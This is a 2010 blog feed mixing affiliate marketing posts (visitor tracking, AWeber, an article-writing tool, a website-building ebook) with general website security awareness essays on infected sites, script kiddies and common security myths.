tag:blogger.com,1999:blog-28681649309757042502024-02-06T18:47:56.684-08:00Website Protection and SecurityJoseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.comBlogger27125tag:blogger.com,1999:blog-2868164930975704250.post-7984428859440764492010-07-31T18:28:00.000-07:002010-08-26T23:34:23.051-07:00Website Live Visitor Tracking NotificationYou have just finished creating your website after much hard work on your part.<br />Now you simply want to know the following:<br /><br />1) What search engines are visiting my website<br />2) What visitors are coming to my website<br />3) What pages are being visited<br />4) What country are they coming from<br /><br />You heard about Google analytics and other sofware tools that you can use. Although these tools are great to use, your main concern now is to quickly determine if the search engines and people are actually visiting your site and you want to know now. You really don't have the time to go the analytic tools, browse through tons of information and hopefully find what you need. What you really want is instant notification when a search engine or visitor has accessed your website.<br /><br />Why do you need this instant notification? You want to determine in real time how effective your website is, how well it is performing, how many people find it useful and how many customers or sales it can generate. You may not be sure if you have the right content on your homepage.<br /><br />You may want to determine immediately why visitors didn't take the action that you wanted them to take. Who knows, maybe 80% of your visitors aren't even making it past your home page? You'll never know unless you get instant notification. These are all very important things that can help you fix the areas that are falling behind.<br /><br />The point of instant tracking notification to your site is so that you can act on the information you gather and use it to improve your web site's effectiveness. If you discover that 80% of your visitors aren't making it past the first page, then you immediately know that you need to improve your website. You can then try to determine why they did not take the action that you wanted them to take. Once you see how most people navigate your web site, you can then make changes until the path they take is the one you want.<br /><br />Instantly knowing where people are entering your site and where they are leaving is also extremely useful. If you instantly know that they are all flooding to one particular page, you might want to optimize that page for conversion. On the other hand, if you know that people are tending to leave from another page, then you can see if you can`t figure out a way to keep them longer on the site.<br /><br />It is important then that you know instantly when someone visits your web page, including browsers, spiders, robots and crawlers, so that you can:<br /><br />1) determine when the major search engines have visited your site<br />2) determine the URL of the page that was visited<br />3) dtermine the Date and Time of the visit<br />4) determine the Browser name that was used to visit your site<br />5) determine the Visitor IP Address<br />6) determine the Visitor Host Name<br />7) determine the Visitor Country, Region and City of origin with high degree of accuracy and without the need of a huge databse <br />8) determine if anyone has tried to hack your site <br />9) determine the visitors who have downloaded your products <br />10) determine what IPs to block <br />11) use a powerful Website Marketing tool <br />12) use a powerful Website security tool <br /><br />They say that "Information is Power and Money". By knowing how to use this information, you can make your website into a very profitable online venture.<br /><br />If you want to learn more about the best live tracking notification on the internet, please visit <a href="http://www.josephschembri-online.com/EmailTracker"><b><i>Website Live Visitor Tracking</i></b></a>, so that you can make your website the most effective it can be.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com2tag:blogger.com,1999:blog-2868164930975704250.post-37098220848419191862010-07-21T11:53:00.000-07:002010-07-21T11:56:15.716-07:00How To Create Your Mailing Lists Fast and EasyIn order for you to be successful in online marketing, you will need to build lists. Several Lists! You need to build lists of customers and prospective customers so that you can keep in touch and sell your product and services. Your mailing list provides you a way of staying in touch with people who have visited your website. Maybe they didn't buy anything the first time they visited your site. However, if you stay in touch with them on a regular basis, they may turn into a loyal customer. While the main purpose of having a mailing list is to promote products, your visitors will be eager to sign up for them if you provide helpful information. <br /><br />You can compile a mailing list by putting an opt-in box on your website. If you are selling a specific product or service, only those with an interest in that product will sign up. When they sign up, you have captured their email address, name and phone number. People find your website by searching the Internet for keywords specific to your product or service. When you have a list, you can market to your customers repeatedly. <br /><br />Once you have a mailing list, you can send emails on a regular basis, which allows you to build rapport with your customers. Prospective customers on your list will get a chance to know you or your company and build trust. This can take some time, but it is well worth the investment. It is much easier to purchase something from someone you know and trust as opposed to buying from a stranger. When you do so, people tend to trust you more and trust that your content is a quality one. Therefore, they will most definitely end up buying your product after some time. <br /><br />Most people won't buy something the first time they visit your site, so using an autoresponder, like Aweber, you can ensure that your site is promoted several times, thus helping to get more sales. All you need to do is save a series of predetermined emails on your Aweber database and once the prospects opt in, they will be sent those emails on an interval that you had set up yourself before. As we all know, and as it has been proven, 70% to 80% of the people who visit a website for the first time do not buy the product straight away. Even though they do not buy your product immediately, there are chances that they will after you follow up on them with a number of messages. <br /><br />Aweber is a service that online marketers use to build their lists of subscribers and hence build a database of people that they can send emails regularly to promote their products and services. That is why when you have your autoresponder, you allow people to subscribe to your website. Once they do, What you include in those messages could be free information, free giveaways, free videos, tips tutorials, etc. <br /><br />When you have a list with a small number, it is easy to interact with your subscribers on an individual basis. However, when your list reaches the thousands, it is difficult to do so. That's when Aweber comes in handy as it allows you to send personalized messages to all your subscribers at once containing each person's first name and personal details. Can't write? No writing skills? No problem! Aweber provides over 100 professionally built and designed templates that you can just copy and change as you like. <br /><br />Aweber comes as a complete solution for anyone wishing to increase marketing efforts by autoresponder or newsletter mailings. Members can use Aweber to promote and pre-sell products to people who are interested. Since most people won't buy something the first time they visit your site, using an autoresponder like Aweber, you can ensure that site is promoted several times, thus helping to get more sales. It tracks when messages should be sent and other analytics without you having to do anything from your end apart from setting the schedule. <br /><br />AWeber is a very different company from the competition. This company is proud of its founder and of the ethical stand it takes on the subjects of privacy, SPAM, and subscriptions. it is recognized as has having created a world-standard system for managing opt-in forms, emails and newsletters online. Its' system of email deliverability is the envy of its competitors, and is a large part of the company's daily operation. Aweber has a clear commitment to ensuring that the opt-in newsletters for its thousands of small businesses around the world are delivered on time and without any hitches. <br /><br />Aweber's standard in follow-up automation and delivery targets has set the standard for the industry. Such capabilities are prized in the internet marketing environment, and it is affiliate marketers that make up a huge proportion of Aweber's clients. They value that they can access the Aweber services 24/7, enabling them to be proactive in responding to news items, events or trends. <br /><br />Because Aweber has a double opt-in system, when subscribers are added to list, the validity of their email address and confirmation of their intent to subscribe is recorded. This helps ensure the integrity of the list details, and to counter any claims of spamming by email recipients. AWeber has a commitment to customer support, and offers a wealth of information to new users including tutorials, 'how to get started' pages on the website, a program of webinars, and a dedicated 24 hour support team. <br /><br /><a href="http://josephschembri.aweber.com/"><b><i>Click Here To Learn More About AWeber</i></b></a> <br /><br />You can consider Aweber as your virtual assistant who monitors your subscribers, sends them emails on a regular basis and who takes the work load off your back and makes your life easy so that you can spend more time doing the other things you need to do about your business!Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com1tag:blogger.com,1999:blog-2868164930975704250.post-26962826732425713102010-07-21T11:41:00.000-07:002010-07-21T11:53:02.227-07:00Instant Article WriterArticles are one of the best ways to drive a flood of free visitors to your website. If you are planning to use article marketing as a major part of your internet marketing strategy, you will soon realize that you have to write a ton of articles to make lots of commissions. Whether you are trying to build backlinks or drive traffic to your affiliate sales page, it takes a lot of effort and a lot of articles. The more articles you can submit, the more backlinks and traffic you'll produce. If you are even considering starting a niche website, you'll need article marketing to succeed.<br /><br />Individuals engaged in internet marketing know that there is no other way to generate traffic than to write articles that contain useful information. This is because people go to the internet to get information and if they don't get it from your website content; they won't bother to visit it. The only way to generate serious traffic to your site is by posting informative articles. People go to the internet to find information, therefore, you have to provide sensible articles which they will want to read for them to go to your site. Article writing can generate continual traffic through the years.<br /><br />When you are in the business of promoting online products, writing articles will entail that you do a lot of research. It takes a long time to research articles, especially if you're not already familiar with the subject that you're wanting to write about. And then there is the writing process. In its entirety, article writing can be very time-consuming and boring. You can pay someone to do it for you but then that will cut your profits.<br /><br />Article writing is the first part of the equation in article marketing. And it is a huge and critical part that directly determines if your marketing efforts are a flop or a success. The premise is that you write informational articles which are content rich and are of a high enough quality to have the potential to reach as many people online as possible. After all, if the quality is not there, your results will be limited. Writing these articles manually will take a lot of time. Researching a subject, then writing the first draft of any article is usually very time consuming.<br /><br />However article writing can be one of those dreadful tedious tasks that you absolutely wish to never do. It can become very time consuming and painful, especially if you're trying to create articles about topics you are not very familiar with.<br /><br />So the dilemma now is how to get those articles done. Article writing can often be a time-consuming and strenuous process. Also, how can someone with mediocre writing skills produce a top-notch article? With the help of <strong>"Instant Article Wizard"</strong> your research time will be drastically decreased. In as little as 8 minutes, you can have all the research on a subject done. What's more, it will help you gather the whole sentences to use in your introduction, conclusion and the body of the article. Then all you have to do is rewrite these sentences, so that the content of your article will be considered original by both the search engines and human editors of various article sites. This way, <strong>"Instant Article Wizard"</strong> will enable you to compile a 500+ words article on any topic in less than 15 minutes. And if you used just a little bit of common sense, your articles will not only be accepted by the article sites, but you will most likely be proclaimed an expert author on a subject.<br /><br /><strong>"Instant Article Wizard"</strong> is a software that can write articles fit for a human being. What makes this software different from the others is that it can combine the needed research as well as the actual writing of the article to help save time. The process of writing articles with the <strong>"Instant Article Wizard"</strong> starts with the keywords that you need to include in the article. The program will then search the internet for any related ideas. Whatever this search comes up with will then be used to write the articles, from introduction to summaries. Instant Article Wizard helps you to create articles in any niche, even if you have no knowledge about it.<br /><br /><strong>Instant Article Wizard</strong> is a software program that helps you create very real humanistic type articles in just a matter of minutes. It's a tool that lets you type in a keyword phrase or main topic and it will automatically start researching the web for ideas for your new article. It quickly gets quality keyword rich text for your introduction, paragraphs, sub topic paragraphs and concluding paragraphs. In addition to supplying sub topics or other keywords that correspond with your main keyword, it allows you to even expand your article writing into sub topics of the main topic.<br /><br />The following is a list of benefits that you get with <strong>Instant Article Wizard</strong>:<br /><br />- It will speed up your research substantially.<br />- It comes in handy when you're stuck for ideas when writing an article.<br />- It can give you ideas for an introductory paragraph or closing paragraph.<br />- It's useful to give you ideas for your articles and to find good information to build on.<br />- It's great for someone working from keyword lists who wants to write articles specifically around each of their keywords.<br />- It's great to help you research and write articles for affiliate sites and adsense sites.<br />- When you want to write several articles on the same subject, use one of the subtopics and take a different spin or perspective on the topic.<br />- You can rewrite the sentences in your own style and voice, modify them, add your own sentences, and create your own unique articles.<br /><br /><strong>Instant Article Wizard</strong> is a unique and revolutionary tool that can allow you to create fantastic, fresh, and unique content in a matter of minutes. To learn more click on the link below:<br /><br /><a href="http://e10964qmgpazdp88qh35pdkhb1.hop.clickbank.net/"><b><i>Click Here To Learn More About Instant Article Wizard</i></b></a><br /><br /><strong>Instant Article Wizard</strong> can save a lot of research time. Without this software, it could take hours to days of research for content and compiling the information needed to write. If you're having a tough time writing your own articles, give Instant Article Wizard a try. I'm sure that you'll be glad you did, as you will be able able to devote more of your time to other areas of your business .Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-16272750069972260862010-07-12T07:24:00.000-07:002010-07-12T07:29:24.282-07:00Infected WebsiteComputer technology and network connections have grown to become central in our lives today. With the increased usage and dependability on computers, the crimes associated with them have risen in popularity to match this growth in usage. As a result, hacking has become a prevalent issue, and most of the time the consequences of a hack can have adverse results to the victim of an infected website.<br /><br />Years ago, no one had to worry about hackers breaking into their website and installing Trojan viruses, or using your website to send attacks against others. Now that things have changed, people need to be aware of how to protect their website from harmful intrusions and how to stop hackers. Hacking has evolved quite a bit over the years. Why do they hack websites? The most common reason is to steal money. Some times hacking is for blackmail. Sometimes hacking is for revenge, or stalking or fame. <br /><br />One of the basic fears for the minority of website owners is being the victim of a vicious hack attack. However, the majority of website owners are confident that their system will not be broken into because there is nothing in the site that could be of interest to the hacker. Nothing can be farther from the truth. The internet is prevalent with countless possibilities. Your website can be a launching point for other attacks. Hackers could use your system as a staging-off point to carry out attacks to other computers. This is a regular occurrence on the net. Many Denial of Service (DoS) attacks are executed in this manner. <br /><br />Everyone needs to worry about hackers. Hackers do not discriminate when it comes to whose website they hack. In fact, smaller websites tend to get hacked more than larger websites. With so much of the world dependent on computers, hackers have become a powerful force and everyone must be aware of this or suffer the consequences of a hacked website. <br /><br />If you have ever had your website hacked then you are all too familiar with that sickening feeling in your stomach caused by mixed feelings including violated, vulnerable, helpless, confused, angry and disgusted. If you have had your website hacked then you are not alone. There are a countless number of hacked websites, many of which do not even know that they are a website infected by a malicious hacker. According to the 2009 Security Threat Report from Sophos, one new infected Web page is discovered every 4.5 seconds. <br /><br />Why then are there so many hacked and infected websites? Many website owners do not see the need for preventative measures - until their website has been infected. Most website owners spend most of their time, money and effort in building traffic to their website. There are often hundreds, perhaps even thousands of businesses offering the same or similar products and services so they put most of their efforts into the necessary steps to stay ahead of the competition. Adding website protection and security is very often put on the back burner. <br /><br />You can spend time, money and effort in building traffic to your website, but you can't even calculate the amount of trust lost if your site has been trying to infect all your visitors. If Google finds your site suspicious, they'll add "This site may harm your computer" on all your Google search engine result pages (SERPs). How do you think this will affect your online marketing plans? Who knows how many of your customers will stop buying from you. <br /><br />Hackers don't leave traces of their attack on the outside. Your site may appear working normally on the surface but underneath, your system data might have been trashed, altered, copied or, at worse, deleted. Valuable data can be up for grab to the highest bidder. Not only can your data be sold online; enterprising hackers can also sell your security leaks to other hackers, spies and cyberterrorists. <br /><br />It is considerably more expensive and more time-consuming to recover from a security incident than to take preventative measures ahead of time. <br /><br />It is a more worthwhile use of your time to do everything you can to protect your site from all hackers, regardless of who they are, and understand that there will be a constant flood of attacks against your site. The more difficult you make it for someone to attack your website, the less likely they will even try. <br /><br />Most people who have websites do not realize that it requires only a few simple steps to ensure some degree of security for your website at absolutely no cost to you. These steps take only minutes to do and no special software or programming knowledge is required. Granted, these basic security steps may not give you the full protection you need, but it will put you ahead of those who do not have any website protection and security at all. <br /><br />In this blog, you will find an article called "Basic Website Protection and Security Steps", where you learn more about these free security steps.<br /><br />Always remember that hackers, like burglars, are opportunists. If you take the security measures to keep your website safe, a hacker will swiftly move on to a site that is less well protected. Securing your website can take minutes, but gives you a lifetime of peace of mind. <br /><br />It is of the upmost importance to remember that, any website connected to the internet is automatically vulnerable to hacker attacks, and will eventually be attacked. Thinking your website will never be attacked is a falsehood that could destroy your website and your online business.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com1tag:blogger.com,1999:blog-2868164930975704250.post-5740494051551349092010-06-29T08:43:00.000-07:002010-06-29T09:00:41.051-07:00How To Create Your Website Fast And EasyIn order to succeed online you have to have a presence, and the only way to achieve this is to have your own website. This can be a daunting prospect for the average Newbie.<br /><br />The growth of the internet has provided website owners with unique business opportunities. This incredible growth has enabled entrepreneurs of all ages to sell their products and services to a worldwide audience.<br /><br />If building a long term business is what you are wanting to do, then creating your own website is a must, in fact, it is vital to your success. Here are five very good reasons why you need a website:<br /><br /><strong>1.</strong> Having your own website creates a professional image and will help you to build a brand name online.<br /><strong>2.</strong> Clients and prospects will be able to find you through the search engines. Lets face it, if they can't find you, they can't buy from you which means you won't make any money which in turn means you won't have a business.<br /><strong>3.</strong> By creating your own website you will save a heap of money. Getting a web designer to build a website for you can set you back thousands of dollars.<br /><strong>4.</strong> You will learn skills which will save you time and money in the long term. Quite often you will want to make changes to your site by removing or adding text, images, video etc., or you may just need to put in a bit of code. If you have a web designer who can to do this for you, you may have to wait for his/her convenience, and you will have to pay for the service. What if that person is not available... you could lose sales and income?<br /><strong>5.</strong> You can provide information which will drive visitors to your site.<br /><br />A lot of people forget how hard it is to start in the business of making money online - mainly because of all the information (and mis-information) out there. One thing is for sure though - if you are serious about making money online - eventually you WILL have to learn how to create your first website. As mentioned before, for most newcomers this thought can be terrifying. However it doesn't need to be. Despite having ZERO technical knowledge, you can teach yourself how to create your first site from scratch. A site that takes a couple of hours to set up can make you money for years to come.<br /><br />You probably have also been frustrated by so-called affiliate marketing experts who bombard you with product after product promising Clickbank and affiliate commission riches without mentioning that you have to know:<br /><br />-how to build a web page<br />-how to tailor and upload website templates<br />-how to set up your hosting account<br />-how to FTP your site to your host (FTP="File Transfer Protocol")<br />-how to insert an auto-responder lead capture form<br />-how to build your list<br />-how to register a domain name<br />-what to do with name-servers<br />-how to cloak your links – properly<br />-how to adjust image size – properly<br /><br />The simple cold-light-of-day-truth is..if you are serious about creating an online business…(and I mean really serious) you will need some simple web skills. I am referring to knowing the PROCESS of building and uploading your own unique website, knowing exactly what to do technically and in what order.<br /><br />Creating your own website is actually not all that difficult. You just need to have a little patience and everything will fall into place nicely. I have discovered a first class resource that will provide the necessary education, understanding and implementation strategies. This first class resource is an ebook called <strong>"Create Your First Website By 3.45 This Afternoon"</strong>, written by Chris Farrell, the most host and genuine guy on the internet. Its' pure easy to understand content will enable you to create your very own website and give you valuable knowledge in all the steps needed in website creation. Chris Farrell has a style of writing that puts the reader at total ease and takes them by the hand and unravels the enigma that is website creation.<br /><br />The ebook is delivered in the most easily understandable and detailed way. Any technical stuff is broken down in such a manner as to be understandable by anyone. It is liberally peppered with explanatory images throughout. Anyone wanting to develop their own website will undoubtedly achieve this as the title suggests within a day. I certainly did when I came across it. It seems to lift the fog of mystery that until now no one has addressed. This ebook explains EXACTLY step-by-step how to get your first site online (and <strong>for fr</strong>ee).<br /><br />What seems daunting to the newcomer to the Internet is explained and shown in great detail. This ebook, <strong>"Create Your First Website By 3.45 This Afternoon":</strong><br /><br />-Is Created Especially For Newcomers and Beginners<br />-Uses non technical language at all times – GUARANTEED<br />-Has already helped THOUSANDS get started online<br />-Contains everything you need to START making money online<br /><br />The eBook will allow anyone to create their own website within hours. It is a step-by-step guide that covers the whole process with nothing left to chance. It is presented in Chris’s unique, and easy to understand style. The eBook covers everything from purchasing a domain name and setting up a hosting account, through to building and uploading your pages to your server.<br /><br />Download <strong>"Create Your First Website By 3.45 This Afternoon"</strong>, at <strong>no cost,</strong> and fill in those gaps in your own internet marketing skill-set, even if you CAN build a website. Chris Farrell provides MUCH MORE. Download your <strong>free copy </strong>at the following link:<br /><br /><a href="http://www.josephschembri-online.com/"><b><i>Click Here For Your Free eBook</i></b></a><br /><br />By the end of this eBook, you will have a working website with multiple pages, including a main page, and links to other pages and other sites. More importantly, you will know how to create, design and publish your site so that you can design new sites any time you want.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-15402310133196763822010-05-20T20:51:00.000-07:002010-05-20T21:09:01.071-07:00So You Think Your Website Won't Get HackedMany website owners believe that by not having a high profile website, cyber criminals will not hack their website. This falsehood has lead to many websites being taken down and in many cases, the complete loss of the online business.<br /><br />One of the hard realities of the internet today is that you need to secure your website before the first time you connect them to the net. Many new websites have, within minutes of being connected to the Internet, been hacked. This effect was caused not by hoards of hackers, but instead by scanning programs constantly searching the net for this weeks favorite vulnerability. <br /><br />Most of the attacks that a website will experience range from random, unstructured episodes to the well-organized and targeted variety—both of which tend to be automated. Automated attacks can vary in their relative complexity, with attacks being initiated against a target or opportunity directly, or (more likely) through several systems that may not even know they are being used as instruments in the attack. Estimates vary on how many systems may currently be compromised in such attacks, but it has been found that the systems used are present in all kinds of situations—from the small business to the large corporation.<br /><br />Who then is typically responsible for carrying out such attacks? In most cases, these automated attacks are launched by those with the lowest skill levels of the hacker community—those known as script kiddies. Script kiddies typically don't have the knowledge of those higher in the hacker community have, but that doesn't mean they can't be dangerous. When script kiddies launch an attack, they typically do so without realizing the results of their actions, such as potentially crashing systems or inadvertently performing a denial of service (DoS). These individuals fit the profile of a newbie who finds a new application, such as a scanner or password cracker, and runs it against large swathes of targets looking for an "interesting" result. <br /><br />It is believed that the vast majority of the "hacker" underground is made up of these script kiddes who have only been using computers for a few years and who really know comparatively little about them. These are people, usually kids, who are attracted by the seemingly magical powers that hacking gives them. Since they know so little about computers, they don't really known how to hack themselves but instead follow recipes or "scripts" developed by real hackers. Most of these scripts are easy-to-use programs whereby the "script-kiddy" simply enters the IP address of the victim.<br /><br />These script kiddies are a subset of hacker-culture. They are are usually young, unknowledgeable, curious and destructive. Unlike 'hackers' who attack a system for profit or personal satisfaction, script kiddies do it because they can. What makes a script-kiddie different from a hacker or an advanced user is that a hacker or advanced user, commonly has a vast understanding of what he or she is doing, explores and locates the security vulnerabilities, and/or creates the programs or scripts that others may use.<br /><br />Lacking the knowledge to write their own exploit code (or understand the code written by others), script kiddies turn to pre-made tools that make exploits click-a-button easy. Unlike a hacker, who chooses a system then scans it for vulnerabilities and exploits them, script kiddies learn about a specific exploit then look for any site, system or server that is vulnerable to it. They also tend to be indiscriminate and may try to compromise any website on the Internet they can reach. <br /><br />This is what makes attacks by script kiddies dangerous to small businesses. They attack randomly, so even if you think that there is no one out there who would be interested in compromising your website, there is a whole community dedicated to searching and scanning for anything to exploit. The adolescent demographic that makes up the majority of script kiddies are searching for power - not money and certainly not a cause that they feel is worthy. Once they find power, they exercise it. Most of them wouldn’t be able to commit a crime (let alone violence) in person. Attacks on systems however add a layer of separation that removes both the stigma and the fear from what they do. They see no connection between their actions on the web and the harm they can and do cause.<br /><br />Script kiddies tend to select their targets based on ease of access and without regard to a system's relative importance or even whether that system is prone to crashing or other instability as a result of the attack. Also consider that in certain cases, script kiddies may post their results or actions on a newsgroup or blog, letting others know how and against whom they perpetrated their attack, thereby making you a bigger target. With a system compromised, an attacker may choose to pick any of a number of actions on the "menu," including attacking other systems or placing utilities on the system with the intent of waiting for valuable data to float by. <br /><br />The attacks that script kiddies launch may look on the surface like those more organized groups, or even what the criminal element employ. In some cases, script kiddies are themselves pawns of organized crime or other organizations that might be looking to make financial gains.<br /><br />Although most good hosting companies will protect their servers (and usually your site to some degree) it’s important to understand that you are responsible for your own site. <br /><br />Script kiddies, unfortunately, are often just as dangerous as exploiters of security lapses on the Internet. The typical script kiddy uses existing and frequently well-known and easy-to-find techniques and programs or scripts to search for and exploit weaknesses in other websites on the Internet - often randomly and with little regard or perhaps even understanding of the potentially harmful consequences.<br /><br />While a hacker will take pride in the quality of an attack - leaving no trace of an intrusion, for example - a script kiddy may aim at quantity, seeing the number of attacks that can be mounted as a way to obtain attention and notoriety. Script kiddies are sometimes portrayed in media as bored, lonely teenagers seeking recognition from their peers. <br /><br />Because of the ease-of-use of these programs, there are hundreds of thousands (if not millions) of script-kiddies on the Internet. This has generated a certain "background-radiation" on the Internet. Any website connected directly to the Internet with a high-speed connection will likely see a fair number of attacks against their system from these script-kiddies.<br /><br />There has often been a tendency among System Administrators to discount the danger of script kiddies, and this can be a misleading and dangerous thing to do. Script kiddies can have a much greater capability to cause problems then their skills alone would indicate. <br /><br />As mentioned previously, most of the time script kiddies will find their victims by using scripts that conduct automated searches and attacks. These scripts written by skilled crackers or modified by some less skilled person are traded via IRC, FTP sites, web sites and other methods and can spread through the net with lightning speed. Soon after a new exploit is discovered and a script written for it, you may find it being used to attack systems all over the world. <br /><br />With thousands of script kiddies who live for the next crack who needs enemies? At least if you had someone gunning for you, you could have some idea of who was after you, what they could do etc. What the script kiddie lacks in skill he/she can make up in time and computing power. Each website they crack adds to their arsenal for the next scanning attack. <br /><br />The process the script kiddies use in scanning for systems to crack make the attack less personal and more abstracted. It can be harder for them to identify with their victims and easier for them to do damage or destroy their target without feeling the twinges of conscious or remorse for their actions. <br /><br />The majority of script kiddies prefer "playing" with unprotected sites. Their programs usually only work if the site is unprotected, or their security is really out of date. These kind of individuals usually can't do anything to a reasonably protected site. Since they are trying to feel important: if they (or their robots) can't get in immediately, they'll just go elsewhere.<br /><br />The only way to win in this game is to stay one step ahead of the hackers, and ironically, this is easy to do with script kiddies. They won't dig deep into your system, they won't be persistant and they won't focus, but all you have to do is leave your website unguarded from the latest vulnerabilities and they will be on your system in hours (if not minutes).<br /><br />You should now hopefully realize that the most important aspect of operating an online business is keeping your investments secure at all times. The internet is a very dangerous place, especially for business that conduct hundreds or thousands of dollars in eCommerce each and every day.<br /><br />It is of the upmost importance to remember that, any website connected to the internet is automatically vulnerable to hacker attacks, and will eventually be attacked. Thinking your website will never be attacked is a falsehood that could destroy your website and your online business.<br /><br />If you want more information on plugging the security loopholes in your website, please visit the following website:<br /><br /><a href="http://www.websiteprotection.net">http://www.websiteprotection.net</a>Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-72909105505385175562010-05-20T11:20:00.000-07:002010-05-20T11:25:21.533-07:00Why So Many Websites Are At RiskI am always amazed by the number of websites that suffer cyber attacks. Despite the enormous number of attacks, and despite widespread publicity about these attacks, most website owners fail to scan effectively for common security flaws. These attacks can range from simple nuisances to dangerous compromises of sensitive data. Many overlook the possibility of the website being destroyed by a virus, even though it is a relatively common occurrence in the online world.<br /><br />With all of the work that goes into building a comprehensive website over time, it can actually be more devastating to lose a website than to lose a PC or even an operating system. When a website is brought down by a virus, it cannot be quickly replaced like an operating system or PC. In fact, the damage that is done can take months to repair, especially when you consider how many negative events can transpire as the result of a worm attack. The most obvious effect will be the loss of traffic that will be seen soon after the worm has infected the website.<br /><br />Most hackers spend hours every day trying to find new exploits, hacking into sites and looking for opportunities to steal cash from hard working business owners. Yet, the business owners do not put forth the same effort to protect their websites. It is important, during website development, that all possible security threats be considered to ensure adequate protection of the website as well as end users.<br /><br />If website security is an extremely important consideration for these online businesses, why are the website owners not mitigating security risks and building customer trusts?<br /><br />After doing some research and speaking with various website owners, I believe I may have come up with some falsehoods most people tend to believe concerning their websites:<br /><br /><strong>1. The Web Developers Deal With Website Security</strong><br /><br />Many people who start up an online business typically hire other people to build their website. They assume that these web developers will incorporate security. This unfortunately is not true, unless you ask them. As stated previously, it is important, during website development, that all possible security threats be considered.<br />In other situations, people may create their own website. They tend to forget about adding website protection and security. Since most people, when they first start out, are on a very low budget, security is the last thing they worry about. Not even the most basic security is incorporated which does not require any special software skills. This may not be perfect, but at least it is better than having no security which makes it easier for people to hack the website.<br /><br /><strong>2. No One Will Hack The Website</strong><br /><br />Many people tend to think it won’t happen to them – why would hackers go for their website when there are huge high profile targets around? Many are fooled by this false sense of security. The sad fact is that big companies can employ legions of experts to ensure their website stays safe and secure. The smaller websites tend to have limited resources, and may also be relying on the company that designed their website.<br />The internet is a very dangerous place, especially for small business that conduct hundreds or thousands of dollars in eCommerce each and every day. These smaller websites have emerged as the target of choice for money hungry hackers. Just registering a new domain name will mean it gets scanned for vulnerabilities and potentially targeted.<br /><br /><strong>3. The Website Uses SSL Certificate (https instead of http)</strong><br /><br />The term "secure website" is often used for the parts of a website where the data transmitted between a user and the server is encrypted. SSL only means the data in transit is encrypted. It does not actually secure a website, its data, the server or its users. SSL has no ability to protect the information stored on the website once it arrives.<br />SSL should be used for transfer of private and sensitive data, but that's just one small part of website security.<br /><br /><strong>4. The Website Is Not Hosted With The Microsoft Operating System</strong><br /><br />When it comes to vulnerabilites in software, and patching of software, most of the news tends to be centered around Microsoft. Since Microsoft is quite popular in use, it stands to reason that it would be mentioned the most.<br />Many people feel that if their Websites are hosted on other operating systems, such as Unix, then they are safe. They fail to realize that these other operating systems still need to have patches and updates regularly applied.<br />Also, many security exploits (e.g. phishing, weak registration/login systems, cross-site scripting (XSS), business logic flaws) are completely independent of the operating system.<br /><br /><strong>5. Website Is Protected By Firewall</strong><br /><br />Firewalls in front of a web server control traffic to that server. But the web server will need to see web requests, so these cannot be filtered. Web application firewalls can assist in protecting known vulnerabilities and unusual traffic but cannot usually provide protection against custom code vulnerabilities, valid use that corrupts data and zero day attacks, which takes advantage of computer vulnerabilities that do not currently have a solution. They can be of use in temporarily filtering traffic when a vulnerability is discovered, but need to be thought of as a temporary fix rather than a permanent repair.<br /><br /><strong>6. The Website Is Always Backed Up</strong><br /><br />Although it is very critical to always backup the website and database in case it is brought down, backups are not a protective mechanism, they are an assistance in recovery. But if the data has been altered maliciously, the backup may well also contain this. Also, backups are unlikely to have everything needed to rebuild the site.<br /><br /><strong>7. The Website Has An Annual Infiltration Test</strong><br /><br />A vulnerability scanner tool will not be able to discover all the vulnerabilities in your website. In particular vulnerabilities in any custom-developed code are unlikely to be found by automated tools. Coupled with the fact that the hosting environment and website code are likely to change over a much shorter time span, automated testing and analysis needs to be undertaken more often. Best practice is to undertake automated testing weekly and have logging and alerting functions which highlight changes to files and potential intrusions on a live basis.<br /><br /><strong>8. The Website Is Up Most Of The Time</strong><br /><br />Hosting providers usually define certain minimum levels of uptime. You need to check how these are calculated, what you are responsible for and what the exclusions are.<br />Owners do not often consider what would happen if their website were unavailable for a period other than a few minutes. Many fail to have plans in place (disaster recovery and business continuity) to deal with the loss of, or access to the website.<br /><br />The falsehoods mentioned appear to be the most basic myths that most people are under the impression of. I am fairly confident that many more falsehoods could be added.<br /><br />The website owners must never forget that they are the website security. What they do or do not do is what makes their websites secure.<br /><br />Always remember that hackers, like burglars, are opportunists. If you take the security measures to keep your website safe, a hacker will swiftly move on to a site that is less well protected. Securing your website can take minutes, but gives you a lifetime of peace of mind.<br /><br />If you want more information on plugging the security loopholes in your website, please visit the following website:<br /><br /><a href="http://www.websiteprotection.net">http://www.websiteprotection.net</a>Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-16058862464591657392010-05-17T12:45:00.000-07:002010-05-17T13:04:45.988-07:00Video of Website Security Means Increased Online salesThe following is a video version of the article on "<STRONG>Website Security Means Increased Online Sales</STRONG>: - -<br /><OBJECT id=BLOG_video-323e8b4f938dcead class=BLOG_video_class width=320 height=266 contentId="323e8b4f938dcead"></OBJECT>Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-83208001395781105932010-05-16T01:25:00.000-07:002010-05-16T01:55:45.066-07:00Website Security Means Increased SalesThe growth of the internet has provided website owners with unique business opportunities. This incredible growth has enabled entrepreneurs of all ages to sell their products and services to a worldwide audience.<br /><br />However, many forget to give their website the same consideration in regards to security. Most people understand the negative effect that a damaged operating system would have on a business owner, and therefore all efforts are made to secure the operating system and the local network. Unfortunately, many overlook their website.<br /><br />Many websites are well aware of the need for an antivirus software to protect their home network and computer, and most of them have such a software installed that actively protects them from malicious software. Again, many forget to give their website the same consideration in regards to security. Unfortunately, many overlook the possibility of the website being destroyed by a virus, even though it is a relatively common occurrence in the online world.<br /><br />With all of the work that goes into building a comprehensive website over time, it may actually be more devastating to lose a website than to lose a PC or even an operating system. When a website is brought down by a virus, it cannot be quickly replaced like an operating system or PC. In fact, the damage that is done can take months to repair, especially 